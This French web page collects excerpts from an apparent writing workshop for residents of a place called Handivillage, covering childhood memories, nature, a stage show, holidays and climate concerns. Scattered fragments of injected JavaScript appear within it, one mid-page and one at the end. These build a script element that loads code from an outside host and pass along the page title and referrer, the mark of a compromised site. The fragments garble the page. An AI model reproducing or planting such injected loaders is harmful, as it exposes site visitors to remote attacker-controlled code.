Mes amis mes amours mes emmerdes

Ces trois composantes constituent sans doute la vie de chacun de nous. Les amis c’est primordial, si l’on excepte la famille. Les amours on y pense toujours. Les emmerdes c’est ce qui gâche tout. En 1 ère année de maternelle, ma copine c’était Corinne. On jouait près de la poubelle à la récréation. Il parait…

La nature

L’air est léger. Je ressens cette légèreté en montagne. J’aperçois tout près de moi des fleurs de montagne comme l’edelweiss, Mais aussi, les pâquerettes et les marguerites. Elles sentent bon. Elles ont différentes couleurs. Elles s’épanouissent devant nous. Il y a des ruisseaux qui coulent, Des poissons qui nagent à contre courant. Tout ça est…

Spectacle « Ivre de rires, Rire de vivre »

Forts de nos premières expériences scéniques, nous avons souhaité remonter sur scène et offrir un nouveau spectacle. Dès lors, Odile l’animatrice de l’atelier d’écriture accompagnée de Mylène la psychologue nous a proposé d’écrire sur nos souvenirs. Pendant 6 mois, nous avons créé des textes sur nos parents, nos grands-parents, nos amis, nos sensations, sur mai…

Le spectacle

Au départ  j’avais le trac surtout quelques minutes avant de monter sur la scène. Après quand j’étais sur la scène j’étais bien. J’ai lu mon texte sur les chevaux avec une lectrice. Elle s’appelait Martine. Nous le lisions à 2 voix. Je me suis appliqué pour le dire. C’était beau! J’ai passé un bon moment, très agréable….

Les deux familles

Tout enfant a un père et une mère issus de deux familles différentes. Et pour l’enfant, c’est parfois difficile de faire la part de ce qui est bien chez l’une, de ce qui est bien chez l’autre. A la même époque, à l’autre bout du village, chez Girody, on construisait sa maison. Il y aurait…

Noël sur le pétale A

Nous avons partagé le goûter ensemble. Nous avons mangé des crêpes au nutella, au sucre, ou à la crème de marron suivant l’envie de chacun.  Pour finir nous avons partagé une boite de chocolats que j’avais offerte. C’était une très belle journée, nous étions tous très heureux. C’était une journée magnifique pour moi.    Caroline G….

Ma vie à Handivillage

En fait, ici, je me demande si les idées que j’ai, puis-je les réaliser? Il ne me reste qu’à tenter de les appliquer. Puis-je le faire? Il ne me reste plus qu’à mettre en pratique et en application : au travail,…ouf, cela est réalisable! Avec ce climat désagréable, il n’ait pas facile d’aller se balader. La…

La Terre menacée par l’Homme

J’aimerais que tous les chefs d’état s’entendent pour le COP 21, c’est très urgent et très important. J’aimerais qu’il se mette en place une association pour protéger la nature, la faune et la flore. Aujourd’hui, tous les politiciens devraient aussi être concernés par cette cause.     Caroline G.      document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s);}

Les grottes et gouffres

J’ai eu  la chance de visiter plusieurs grottes et gouffres de Dordogne ou du Lot. Quand j’étais petit, j’ai visité la  grotte de Fond de Gomme. Gamin, j’avais déjà été impressionné par les peintures pariétales. Plus tard, j’ai pu voir le facsimilé de Lascaux et j’ai été époustouflé par cette Chapelle Sixtine préhistorique. Près du…

Mes vacances à la montagne

Fin décembre 2014, je suis allé a la montagne avec l’organisme UFCV. J’ai passé d’excellentes vacances là- bas. Pendant le séjour, j’ai marché dans la neige c’était difficile, je m’enfonçais dans cette neige poudreuse. La plupart du temps, nous restions dans le gîte. Moi, j’ai fait beaucoup de dessins que je donnais aux animatrices. Pendant…

 s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if (document.currentScript) {